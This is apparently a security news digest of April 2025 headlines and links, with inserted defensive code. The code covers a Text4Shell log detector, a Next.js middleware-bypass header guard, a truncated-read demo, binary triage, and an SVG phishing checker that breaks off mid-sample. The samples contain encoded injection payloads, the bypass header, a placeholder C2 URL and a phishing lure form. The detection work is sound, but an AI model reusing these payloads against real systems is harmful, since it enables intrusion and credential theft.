For businesses that accept online payments, compliance with the Payment Card Industry Data Security Standard (PCI DSS) is essential, but it doesn't have to be overwhelming.
If your business does not store, process, or transmit cardholder data (CHD) and relies on a third-party service provider (TPSP) for payment processing, you may qualify for a Self-Assessment Questionnaire (SAQ) A or SAQ A-EP—a streamlined approach to PCI D...
https://cloudsecurityalliance.org/articles/understanding-saq-a-and-saq-a-ep-eligibility-a-streamlined-approach-to-pci-dss-compliance
RSAC 2025 Preview: What's The Buzz To Know Before the Show?
https://www.proofpoint.com/us/newsroom/news/rsac-2025-preview-whats-buzz-know-show
Zoom attack tricks victims into allowing remote access to install malware and steal money
Attackers are luring victims into a Zoom call and then taking over their PC to install malware, infiltrate their accounts, and steal their assets.
https://www.malwarebytes.com/blog/news/2025/04/zoom-attack-tricks-victims-into-allowing-remote-access-to-install-malware-and-steal-money
XLoader Info-stealer Distributed Using MS Equation Editor Vulnerability (CVE-2017-11882)
AhnLab Security Intelligence Center (ASEC) publishes the information of phishing emails to AhnLab TIP monthly under the title “Trends Report on Phishing Emails.” There are various keywords/topics disguised as phishing, and this blog will cover cases where emails disguised as emails for checking purchases and order confirmations are used to distribute the XLoader info-stealer. The […]
https://asec.ahnlab.com/en/87724/
THE NEW Rapid7 MDR for Enterprise: Tailored Detection and Response for Complex Environments
We're excited to introduce Rapid7 MDR for Enterprise—a fully managed, customized detection and response service designed to meet the complexity of the modern enterprise head-on.
https://blog.rapid7.com/2025/04/24/the-new-rapid7-mdr-for-enterprise-tailored-detection-and-response-for-complex-environments/
Android malware turns phones into malicious tap-to-pay machines
A newly discovered malicious program effectively turns Android phones into malicious tap machines that vacuum up payment card data.
https://www.malwarebytes.com/blog/news/2025/04/android-malware-turns-phones-into-malicious-tap-to-pay-machines
4.7 million customers’ data accidentally leaked to Google by Blue Shield of California
Blue Shield of California said it accidentally leaked the personal data of 4.7 million individuals to Google after a Google Analytics misconfiguration.
https://www.malwarebytes.com/blog/news/2025/04/4-7-million-customers-data-accidentally-leaked-to-google-by-blue-shield-of-california
Cybercrime Magazine's First YouTube Video: A 60-Second Walk In The Park
This week in cybersecurity from the editors at Cybercrime Magazine. Watch the YouTube Video. Sausalito, Calif. – Apr. 24, 2025 – YouTube turned 20 years old yesterday. The Verge reports that the platform's first video, “Me at the Zoo,” was uploaded to YouTube on Apr. 23, 2005. It's
The post Cybercrime Magazine’s First YouTube Video: A 60-Second Walk In The Park appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybercrime-magazines-first-youtube-video-a-60-second-walk-in-the-park/
PEGASUS-NEO - A Comprehensive Penetration Testing Framework Designed For Security Professionals And Ethical Hackers. It Combines Multiple Security Tools And Custom Modules For Reconnaissance, Exploitation, Wireless Attacks, Web Hacking, And More
http://www.kitploit.com/2025/04/pegasus-neo-comprehensive-penetration.html
Q4 2024 Cyber Attacks Statistics
I aggregated the statistics created from the cyber attacks timelines published in Q4 2024. In this period, I collected a total of 694 events dominated by Cyber Crime with 70%, slightly up from 65.5% of Q3.
https://www.hackmageddon.com/2025/04/24/q4-2024-cyber-attacks-statistics/
Proofpoint Appoints Mark Templeton to its Board of Directors
https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-appoints-mark-templeton-board-of-directors
MIWIC25: Helen Oluyemi, Information Security Manager at Pollinate International Limited
Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2024's Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee's answers are […]
The post MIWIC25: Helen Oluyemi, Information Security Manager at Pollinate International Limited appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/24/miwic25-helen-oluyemi-information-security-manager-at-pollinate-international-limited/?utm_source=rss&utm_medium=rss&utm_campaign=miwic25-helen-oluyemi-information-security-manager-at-pollinate-international-limited
Operation SyncHole: Lazarus APT goes back to the well
Kaspersky GReAT experts uncovered a new campaign by Lazarus APT that exploits vulnerabilities in South Korean software products and uses a watering hole approach.
https://securelist.com/operation-synchole-watering-hole-attacks-by-lazarus/116326/
Shopify faces privacy lawsuit for collecting customer data
Shopify is facing a class action lawsuit that could change the way globally active companies can be held accountable
https://www.malwarebytes.com/blog/news/2025/04/shopify-faces-privacy-lawsuit-for-collecting-customer-data
DOGE Worker's Code Supports NLRB Whistleblower
A whistleblower at the National Labor Relations Board (NLRB) alleged last week that denizens of Elon Musk's Department of Government Efficiency (DOGE) siphoned gigabytes of data from the agency's sensitive case files in early March. The whistleblower said accounts created for DOGE at the NLRB downloaded three code repositories from GitHub. Further investigation into one of those code bundles shows it is remarkably similar to a program published in January 2025 by Marko Elez, a 25-year-old DOGE employee who has worked at a number of Musk's companies.
https://krebsonsecurity.com/2025/04/doge-workers-code-supports-nlrb-whistleblower/
Implementing CCM: Enterprise Risk Management Controls
The Cloud Controls Matrix (CCM) is a framework of controls that are essential for cloud computing security. It is created and updated by CSA and aligned to CSA best practices.
You can use CCM to systematically assess and guide the security of any cloud implementation. CCM also provides guidance on which actors within the cloud supply chain should implement which security controls. Both cloud service customers (CSCs) and cloud service providers (CSPs) use CCM in many ways.
CSCs use CCM ...
https://cloudsecurityalliance.org/articles/implementing-ccm-enterprise-risk-management-controls
Phishing Tests: What Your Provider Should Be Telling You
Originally published by Schellman.
Written by Austin Bentley.
It's no secret: many organizations view and treat phishing as a periodic checkbox assessment. It's often a basic email template sent to an entire organization. If someone clicks the link, they are recorded and possibly enrolled in training. While this approach can certainly check the “quarterly phishing exercise” box, you should consider demanding even more from your phishing assessment. After all, when you engag...
https://cloudsecurityalliance.org/articles/phishing-tests-what-your-provider-should-be-telling-you
Proofpoint unveils unified platforms to combat data & cyber risks
https://www.proofpoint.com/us/newsroom/news/proofpoint-unveils-unified-platforms-combat-data-cyber-risks
MIWIC25: Jess Matthews, Compliance Governance Officer at Acacium Group
Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2024's Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee's answers are […]
The post MIWIC25: Jess Matthews, Compliance Governance Officer at Acacium Group appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/23/miwic25-jess-matthews/?utm_source=rss&utm_medium=rss&utm_campaign=miwic25-jess-matthews
Ransom & Dark Web Issues Week 4, April 2025
ASEC Blog publishes Ransom & Dark Web Issues Week 4, April 2025 A major Dutch food distribution company has been listed as a new victim of INC Ransom ransomware. Ransomware group DevMan claims an attack on a Singapore construction company. The city of Grove in Oklahoma, USA, […]
https://asec.ahnlab.com/en/87627/
From Noise to Action: Introducing Intelligence Hub
We are delighted to announce the availability of Intelligence Hub, an evolution in threat intelligence delivery that is designed to provide meaningful context and actionable insights integrated with the Rapid7 Command Platform.
https://blog.rapid7.com/2025/04/23/from-noise-to-action-introducing-intelligence-hub/
Security-Focused Brokers Underwrite Better Cyberinsurance Policies
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in Insurance Business Magazine Sausalito, Calif. – Apr. 23, 2025 As ransomware, social engineering, and AI-driven deception reshape the threat landscape, cyberinsurance brokers are under pressure to deliver more than just
The post Security-Focused Brokers Underwrite Better Cyberinsurance Policies appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/security-focused-brokers-underwrite-better-cyberinsurance-policies/
Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions before 1.10.0 (1.5 through 1.9 are affected). The exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands. In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name varies between implementations, so users should adapt the payload and request path to the target application's logic. Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk. Description This...
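The defensive counterpart to the PoC above, as an added example that is not part of the kitploit post or the tool it describes: a detector that walks web access logs, percent-decodes each request target (repeatedly, so double encoding does not hide anything) and flags the three Commons Text interpolators that execute code or reach the network (script, dns, url). The log lines are constructed in a combined-log layout; the request target is the only field inspected.

```python
"""Detect Text4Shell (CVE-2022-42889) lookup probes in web access logs.

Added example for this digest entry; it is not code from the kitploit post or
the PoC it describes. The log lines below are constructed in a combined-log
layout; only the quoted request target is inspected.
"""
import re
from urllib.parse import unquote

# Interpolators that execute code or reach the network when a vulnerable
# Commons Text StringSubstitutor processes attacker-controlled input.
DANGEROUS_LOOKUPS = ("script", "dns", "url")

# "${script:" and friends, tolerating whitespace and mixed case.
LOOKUP_RE = re.compile(
    r"\$\{\s*(" + "|".join(DANGEROUS_LOOKUPS) + r")\s*:", re.IGNORECASE
)
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|PATCH|DELETE)\s+(\S+)\s+HTTP/')


def normalize(target: str, rounds: int = 3) -> str:
    """Percent-decode up to `rounds` times so double encoding cannot hide the payload."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def find_text4shell(lines):
    """Return (line_number, lookup_name, decoded_target) for each request carrying a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = normalize(match.group(1))
        lookup = LOOKUP_RE.search(target)
        if lookup:
            hits.append((number, lookup.group(1).lower(), target))
    return hits


# Constructed sample: benign request, single-encoded script probe, double-encoded dns probe.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Apr/2025:10:01:02 +0000] "GET /search?data=hello HTTP/1.1" 200 512',
    '203.0.113.9 - - [23/Apr/2025:10:01:05 +0000] '
    '"GET /search?data=%24%7Bscript%3Ajavascript%3A1%2B1%7D HTTP/1.1" 500 0',
    '198.51.100.4 - - [23/Apr/2025:10:01:09 +0000] '
    '"POST /api?q=%2524%257Bdns%253Aaddress%253Aexample.com%257D HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    for number, name, target in find_text4shell(SAMPLE_LOG):
        print(f"line {number}: {name} lookup in {target}")
```

The decoded target is kept in each hit so an analyst can see the exact lookup that was attempted; a 500 next to a script lookup, as in the second sample line, is the typical sign that the substitutor actually evaluated it.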
http://www.kitploit.com/2025/04/text4shell-exploit-custom-python-based.html
Extortion and Ransomware Trends January-March 2025
Ransomware leak site data and Unit 42 case studies reveal new trends from Q1 2025, including the most active groups, targeted industries and novel extortion tactics.
The post Extortion and Ransomware Trends January-March 2025 appeared first on Unit 42.
https://unit42.paloaltonetworks.com/2025-ransomware-extortion-trends/
How fraudsters abuse Google Forms to spread scams
The form and quiz-building tool is a popular vector for social engineering and malware. Here's how to stay safe.
https://www.welivesecurity.com/en/scams/how-fraudsters-abuse-google-forms-spread-scams/
New Cloud Security Alliance Certification Program Equips Professionals With Skills to Ensure Responsible and Safe Development and Management of Artificial Intelligence (AI)
Partnership with Northeastern University to deliver critical education for the future of IT and cybersecurity
SAN FRANCISCO (RSA Conference) and SEATTLE – April 28, 2025 – The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining standards, certifications, and best practices to help ensure a secure cloud computing environment, has partnered with Northeastern University to develop the Trusted AI Safety Knowledge & Certification Program. This program...
https://cloudsecurityalliance.org/articles/csa-certification-program-equips-professionals-with-skills-to-ensure-responsible-and-safe-development-and-management-of-artificial-intelligence-ai
A New Era for Compliance: Introducing the Compliance Automation Revolution (CAR)
Written by Daniele Catteddu, CTO, Cloud Security Alliance (CSA).
Introducing the Compliance Automation Revolution (CAR) Initiative
In today's rapidly evolving digital landscape, it is of strategic importance that technology providers are not only secure but can, at any time and in a consistent manner, demonstrate ongoing protection of data whenever required. In other words, compliance and assurance are paramount. Organizations operate in an environment shaped by eve...
https://cloudsecurityalliance.org/articles/a-new-era-for-compliance-introducing-the-compliance-automation-revolution-car
Elevate your organization's success: Submissions now open for the 2025 Sonatype Elevate Awards
We are thrilled to announce that the 2025 Sonatype Elevate Awards are officially open for submissions.
https://www.sonatype.com/blog/elevate-your-organizations-success-submissions-now-open-for-the-2025-sonatype-elevate-awards
Proofpoint Unveils Industry's First and Only Unified Solution to Reduce Costs and Cyber Risk Across the Expanding Workspace
https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-unveils-industrys-first-and-only-unified-solution-reduce-costs
Proofpoint Debuts Unified Data Security Protection Across Data Exfiltration, Exposure and Insider Threats
https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-debuts-unified-data-security-protection-across-data-exfiltration
December 2024 Cyber Attacks Statistics
After the cyber attacks timelines, it's time to publish the statistics for December 2024 where I collected and analyzed 209 events primarily driven by Cyber Crime.
https://www.hackmageddon.com/2025/04/22/december-2024-cyber-attacks-statistics/
All Gmail users at risk from clever replay attack
All Google accounts could end up compromised by a clever replay attack on Gmail users that abuses Google infrastructure.
https://www.malwarebytes.com/blog/news/2025/04/all-gmail-users-at-risk-by-clever-replay-attack
Russian organizations targeted by backdoor masquerading as secure networking software updates
While investigating an incident, we discovered a sophisticated new backdoor targeting Russian organizations by impersonating secure networking software updates.
https://securelist.com/new-backdoor-mimics-security-software-update/116246/
Ransomware Damage To Cost The World $57B In 2025
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in Cybercrime Magazine Sausalito, Calif. – Apr. 22, 2025 Cybersecurity Ventures publishes a chart at RansomwareCost.com containing our calculations of global ransomware damage cost predictions from 2015 to 2031. For this year, 2025,
The post Ransomware Damage To Cost The World $57B In 2025 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/ransomware-damage-to-cost-the-world-57b-in-2025/
Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)
A Python script to check Next.js sites for the corrupt middleware vulnerability (CVE-2025-29927). The vulnerability allows an attacker to bypass authentication and access protected routes by sending a custom x-middleware-subrequest header. Next.js versions affected: 11.1.4 and up (the excerpt gives no upper bound; the fix shipped in Next.js 14.2.25 and 15.2.3). [!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.
Installation
Clone the repo:
  git clone https://github.com/takumade/ghost-route.git
  cd ghost-route
Create and activate a virtual environment:
  python -m venv .venv
  source .venv/bin/activate
Install dependencies:
  pip install -r requirements.txt
Usage
  python ghost-route.py <url> <path> <show_headers>...
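The mitigation side of the same bug, as an added example that is not code from ghost-route or Next.js: Vercel's published workaround for deployments that could not patch immediately was to block external requests carrying the x-middleware-subrequest header before they reach the Next.js server, since that header is what makes the middleware skip its checks. The WSGI guard below models that rule in front of a stub upstream. The request headers driven through it are constructed, and the header value "middleware" is a placeholder, not the value the scanner sends.

```python
"""Edge guard for CVE-2025-29927 (Next.js middleware bypass).

Added example for this digest entry, not code from ghost-route or Next.js.
It blocks or strips any client-supplied x-middleware-subrequest header in
front of the application server. Request headers below are constructed and
the header value "middleware" is a placeholder.
"""
from wsgiref.util import setup_testing_defaults

# WSGI spells the header "X-Middleware-Subrequest" as this environ key.
BYPASS_ENV_KEY = "HTTP_X_MIDDLEWARE_SUBREQUEST"


class DropMiddlewareSubrequest:
    """WSGI middleware placed in front of the upstream.

    block=True answers 403 to any request carrying the header (loud, useful
    while hunting for scanners); block=False silently strips it and forwards.
    """

    def __init__(self, app, block=True):
        self.app = app
        self.block = block

    def __call__(self, environ, start_response):
        # pop() removes the header whatever the mode, so it never reaches upstream.
        if environ.pop(BYPASS_ENV_KEY, None) is not None and self.block:
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"forbidden\n"]
        return self.app(environ, start_response)


def upstream_stub(environ, start_response):
    """Stand-in for the Next.js server: reports whether the header reached it."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    if BYPASS_ENV_KEY in environ:
        return [b"header-reached-upstream\n"]
    return [b"clean\n"]


def drive(app, headers):
    """Run a WSGI app against constructed request headers; return (status, body)."""
    environ = {}
    setup_testing_defaults(environ)
    for name, value in headers.items():
        environ["HTTP_" + name.upper().replace("-", "_")] = value
    captured = {}

    def start_response(status, response_headers, exc_info=None):
        captured["status"] = status

    body = b"".join(app(environ, start_response)).decode()
    return captured["status"], body


if __name__ == "__main__":
    guarded = DropMiddlewareSubrequest(upstream_stub)
    print(drive(guarded, {}))
    print(drive(guarded, {"X-Middleware-Subrequest": "middleware"}))
    print(drive(upstream_stub, {"X-Middleware-Subrequest": "middleware"}))
```

The same rule belongs at whatever sits in front of Next.js in production (a CDN header rule or reverse-proxy directive); the guard here is only the shape of the check, and patching remains the actual fix.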
http://www.kitploit.com/2025/04/ghost-route-ghost-route-detects-if-next.html
Will super-smart AI be attacking us anytime soon?
What practical AI attacks exist today? “More than zero” is the answer – and they're getting better.
https://www.welivesecurity.com/en/cybersecurity/super-smart-ai-attacking/
The Role of SSL Certificates in Website Security and Performance
Secure Sockets Layer (SSL) certificates are important for website security. Almost every list of website…
The Role of SSL Certificates in Website Security and Performance on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/22/the-role-of-ssl-certificates-in-website-security-and-performance/
Implementing CCM: Data Protection and Privacy Controls
The Cloud Controls Matrix (CCM) is a framework of essential cloud security controls that follow CSA best practices. You can use CCM to assess and guide the security of any cloud implementation. CCM also provides guidance on which actors within the cloud supply chain should implement which security controls. Both cloud service customers (CSCs) and cloud service providers (CSPs) use CCM in many ways.
CCM contains 197 control objectives structured into 17 domains that cover all key aspe...
https://cloudsecurityalliance.org/articles/implementing-ccm-data-protection-and-privacy-controls
CrushFTP Authentication Bypass
What is the Vulnerability? FortiGuard Labs has observed in-the-wild attack attempts targeting CVE-2025-31161, an authentication bypass vulnerability in CrushFTP managed file transfer (MFT) software. Successful exploitation may grant attackers administrative access to the application, posing a serious threat to enterprise environments. The vulnerability is remotely exploitable, and a proof-of-concept (PoC) exploit is now publicly available. This increases the risk of rapid adoption by threat actors, including ransomware groups who have historically targeted MFT platforms like MOVEit Transfer and Cleo MFT. According to the Shadowserver Foundation, approximately 1,800 unpatched, internet-exposed CrushFTP instances remain vulnerable globally, heightening the urgency for immediate mitigation. What...
https://fortiguard.fortinet.com/threat-signal-report/6072
Whistleblower: DOGE Siphoned NLRB Case Data
A security architect with the National Labor Relations Board (NLRB) alleges that employees from Elon Musk's Department of Government Efficiency (DOGE) transferred gigabytes of sensitive data from agency case files in early March, using short-lived accounts configured to leave few traces of network activity. The NLRB whistleblower said the unusually large data outflows coincided with multiple blocked login attempts from an Internet address in Russia that tried to use valid credentials for a newly created DOGE user account.
https://krebsonsecurity.com/2025/04/whistleblower-doge-siphoned-nlrb-case-data/
Forging Robust Cloud Defenses for Modern Businesses
Originally published by Reemo.
Written by Florent Paret.
The wholesale adoption of cloud technology has become a cornerstone of digital transformation, empowering enterprises with unprecedented agility and scalability within today's fiercely competitive landscape. Yet, this evolution introduces a labyrinth of security challenges demanding immediate and decisive action. Cloud-based services now constitute the lifeblood of business operations, underscoring the critical neces...
https://cloudsecurityalliance.org/articles/forging-robust-cloud-defenses-for-modern-businesses
CVE-2025-3857 - Infinite loop condition in Amazon.IonDotnet
Publication Date: 2025/04/21 08:00 AM PDT
Description
Amazon.IonDotnet (ion-dotnet) is a .NET library with an implementation of the Ion data serialization format.
We identified CVE-2025-3857, an infinite loop condition in Amazon.IonDotnet. When reading binary Ion data through this library using the RawBinaryReader class, Amazon.IonDotnet does not check the number of bytes read from the underlying stream while deserializing the binary format. If the Ion data is malformed or truncated, this triggers an infinite loop condition that could potentially result in a denial of service.
We released a fix in version 1.3.1 and recommend users upgrade to address this issue. Additionally, ensure any forked or derivative code is patched to incorporate the new fixes.
Affected version: ...
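The bug class behind this bulletin, shown as an added example that is not code from Amazon.IonDotnet: a deserializer that loops until it has the number of bytes the header declares, but never checks how many bytes the stream actually returned, spins forever once the stream hits EOF on truncated input. The toy format below (one type byte, one length byte, payload) stands in for Ion, and the sample bytes are constructed; the vulnerable loop carries an iteration cap only so the demonstration terminates.

```python
"""Short-read handling in a binary deserializer, the bug class behind CVE-2025-3857.

Added example, not code from Amazon.IonDotnet. A toy length-prefixed record
format (1 type byte, 1 length byte, payload) stands in for Ion. Sample bytes
are constructed.
"""
import io


class TruncatedInput(ValueError):
    """Raised when the stream ends before the declared payload length is satisfied."""


def read_payload_unchecked(stream, length, max_spins=1000):
    """Vulnerable pattern: loop until `length` bytes arrive without checking for EOF.

    `max_spins` exists only so this demonstration terminates; the real bug has
    no such bound. Returns (payload, spins).
    """
    buf = bytearray()
    spins = 0
    while len(buf) < length:
        chunk = stream.read(length - len(buf))
        buf.extend(chunk)  # at EOF chunk is b"" and the loop makes no progress
        spins += 1
        if spins >= max_spins:
            break
    return bytes(buf), spins


def read_payload_checked(stream, length):
    """Fixed pattern: a zero-length read means EOF; treat it as malformed input, not 'retry'."""
    buf = bytearray()
    while len(buf) < length:
        chunk = stream.read(length - len(buf))
        if not chunk:
            raise TruncatedInput(
                f"expected {length} payload bytes, stream ended after {len(buf)}"
            )
        buf.extend(chunk)
    return bytes(buf)


def parse_records(data: bytes):
    """Parse every record with the checked reader; returns a list of (type, payload)."""
    stream = io.BytesIO(data)
    records = []
    while True:
        header = stream.read(2)
        if not header:
            return records
        if len(header) < 2:
            raise TruncatedInput("record header cut short")
        rtype, length = header[0], header[1]
        records.append((rtype, read_payload_checked(stream, length)))


def count_spins(payload_bytes: bytes, length: int, max_spins: int = 1000):
    """Drive the vulnerable reader over a buffer; shows how many times it loops."""
    return read_payload_unchecked(io.BytesIO(payload_bytes), length, max_spins)


# Constructed inputs: a well-formed record and the same record missing 2 payload bytes.
GOOD = bytes([0x01, 0x05]) + b"hello"
TRUNCATED = bytes([0x01, 0x05]) + b"hel"

if __name__ == "__main__":
    print(parse_records(GOOD))
    print(count_spins(TRUNCATED[2:], 5))  # the unchecked loop hits the cap
    try:
        parse_records(TRUNCATED)
    except TruncatedInput as exc:
        print("checked reader:", exc)
```

Stream APIs in every mainstream runtime (.NET's Stream.Read included) may return fewer bytes than requested, and zero at EOF; any read loop that treats zero as "not yet" rather than "never" is a denial-of-service bug waiting for a truncated file.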
https://aws.amazon.com/security/security-bulletins/AWS-2025-009/
Malicious LNK Disguised as Notices
AhnLab SEcurity intelligence Center (ASEC) recently discovered a malicious LNK file being distributed to Korean users for the purpose of stealing user information. This type of malware collects various valuable data for threat actors, such as data related to virtual assets, browsers, public certificates, and email files, and it also performs keylogging. The confirmed malicious […]
https://asec.ahnlab.com/en/87620/
Distribution of PebbleDash Malware in March 2025
PebbleDash is a backdoor malware that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) identified in 2020 as a backdoor of Lazarus (Hidden Cobra). At the time, it was known as the malware of the Lazarus group, but recently there have been more cases of the PebbleDash malware being […]
https://asec.ahnlab.com/en/87621/
Shadow downloads – How developers have become the new perimeter
With great power comes great responsibility.
https://www.sonatype.com/blog/shadow-downloads-how-developers-have-become-the-new-perimeter
Cybersecurity VC deal flow and M&A activity heat up in early 2025
This week in cybersecurity from the editors at Cybercrime Magazine –Listen to the Podcast Sausalito, Calif. – Apr. 21, 2025 Crunchbase reports that overall, the first quarter of 2025 marked the strongest one for venture investment since Q2 2022, and it was also the strongest quarter for
The post Cybersecurity VC deal flow and M&A activity heat up in early 2025 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybersecurity-vc-deal-flow-and-ma-activity-heat-up-in-early-2025/
Top Lessons from Take Command 2025
Take Command 2025 delivered big insights on AI, exposure management, red teaming, and cloud defense. Catch up with on-demand sessions.
https://blog.rapid7.com/2025/04/21/top-lessons-from-take-command-2025/
Bytesrevealer - Online Reverse Engineering Viewer
Bytes Revealer is a reverse engineering and binary analysis tool designed for security researchers, forensic analysts, and developers. With features such as hex view, visual representation, string extraction, entropy calculation, and file signature detection, it helps users uncover hidden data inside files. Whether you are analyzing malware, debugging binaries, or investigating unknown file formats, Bytes Revealer makes it easy to explore, search, and extract information from any binary file. Bytes Revealer does NOT store any file or data; all analysis is performed in your browser. Current limitation: files under 50MB support every analysis; larger files, up to 1.5GB, only get Visual View and Hex View. Features File Analysis Chunked file processing for...
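Three of the checks listed above (entropy, string extraction, file signature detection), implemented as an added example so the reader can see what each one actually computes; this is not code from Bytes Revealer. The magic table covers a handful of common formats, and the sample buffer is constructed to carry a fake PE header, an ASCII URL and a UTF-16LE string.

```python
"""Minimal binary triage: Shannon entropy, printable strings, magic-byte signatures.

Added example, not code from Bytes Revealer. The signature table is a small
subset of well-known headers; the sample buffer is constructed.
"""
import math
import re
from collections import Counter

# (offset, magic bytes, label); all of these headers sit at offset 0.
SIGNATURES = [
    (0, b"\x7fELF", "ELF executable"),
    (0, b"MZ", "DOS/PE executable"),
    (0, b"\x89PNG\r\n\x1a\n", "PNG image"),
    (0, b"PK\x03\x04", "ZIP archive (also docx/jar/apk)"),
    (0, b"%PDF-", "PDF document"),
]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform). High values suggest packing or encryption."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def extract_strings(data: bytes, min_len: int = 4):
    """ASCII runs followed by UTF-16LE runs of printable characters, like the `strings` utility."""
    ascii_runs = [
        m.group().decode("ascii")
        for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)
    ]
    wide_runs = [
        m.group().decode("utf-16le")
        for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)
    ]
    return ascii_runs + wide_runs


def detect_signature(data: bytes) -> str:
    """Label of the first matching magic signature, or 'unknown'."""
    for offset, magic, label in SIGNATURES:
        if data[offset:offset + len(magic)] == magic:
            return label
    return "unknown"


def triage(data: bytes) -> dict:
    """One-shot summary an analyst would glance at before opening a disassembler."""
    return {
        "size": len(data),
        "type": detect_signature(data),
        "entropy": round(shannon_entropy(data), 3),
        "strings": extract_strings(data),
    }


# Constructed sample: fake PE header, padding, an ASCII URL, then a UTF-16LE string.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"https://c2.example.invalid/gate" + b"\x00\x00"
    + "cmd.exe".encode("utf-16le")
)

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Entropy is most useful per region rather than for the whole file: a packed section near 8.0 next to a code section around 6.0 is the pattern that points at a packer or an encrypted payload.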
http://www.kitploit.com/2025/04/bytesrevealer-online-reverse.html
Interview with Safety Detectives
Happy Monday, friends! I hope you had a great weekend. I had an interesting interview with Safety Detectives about steps we can take to make things better for the next generation of cyber defenders. I encourage you to check out the article, here: https://www.safetydetectives.com/blog/lesley-carhart-dragos/
https://tisiphone.net/2025/04/21/interview-with-safety-detectives/
Lumma Stealer – Tracking distribution channels
During incident response activities, our GERT team discovered Lumma Stealer in a customer's infrastructure. Our experts conducted an investigation and analyzed its distribution scheme in detail.
https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/
False Face: Unit 42 Demonstrates the Alarming Ease of Synthetic Identity Creation
North Korean IT workers are reportedly using real-time deepfakes to secure remote work, raising serious security concerns. We explore the implications.
The post False Face: Unit 42 Demonstrates the Alarming Ease of Synthetic Identity Creation appeared first on Unit 42.
https://unit42.paloaltonetworks.com/north-korean-synthetic-identity-creation/
Phishing attacks leveraging HTML code inside SVG files
Attackers are increasingly sending phishing emails with SVG attachments that contain embedded HTML pages or JavaScript code.
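A mail-gateway triage check for this technique, as an added example that is not from the Securelist article: it parses an SVG attachment and flags the constructs that turn an image into a phishing page once a browser opens it (script elements, foreignObject blocks that carry HTML, on* event handlers, and javascript:/data: or external links). The two sample files are constructed; the "login.example.invalid" host is a placeholder.

```python
"""Triage SVG attachments for embedded HTML/JavaScript.

Added example, not from the Securelist article. Sample files are constructed.
"""
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
# Elements that carry script or HTML content inside an SVG document.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "object", "embed"}
LINK_ATTRS = ("href", XLINK_HREF)


def local_name(tag: str) -> str:
    """'{namespace}name' -> 'name', lower-cased for comparison."""
    return tag.rsplit("}", 1)[-1].lower()


def triage_svg(svg_bytes: bytes):
    """Return human-readable findings; an empty list means no active content was seen.

    xml.etree does not fetch external entities but does expand internal ones,
    so use defusedxml in front of it when processing untrusted mail at scale.
    """
    findings = []
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"unparseable XML ({exc}); treat as suspicious"]
    for elem in root.iter():
        name = local_name(elem.tag)
        if name in ACTIVE_TAGS:
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            aname = local_name(attr)
            if aname.startswith("on"):  # onload, onclick, onmouseover, ...
                findings.append(f"event handler {aname}= on <{name}>")
            if attr in LINK_ATTRS:
                scheme = value.strip().lower().split(":", 1)[0]
                if scheme in ("javascript", "data"):
                    findings.append(f"{scheme}: link on <{name}>")
                elif scheme in ("http", "https"):
                    findings.append(f"external link {value.strip()} on <{name}>")
    return findings


# Constructed: a plain icon, and a lure that embeds HTML, script, a handler and an external link.
BENIGN = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10" fill="blue"/>
</svg>"""

PHISH = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="https://login.example.invalid/verify"><text x="0" y="15">Open document</text></a>
  <foreignObject width="100%" height="100%">
    <body xmlns="http://www.w3.org/1999/xhtml"><form action="https://login.example.invalid/p"></form></body>
  </foreignObject>
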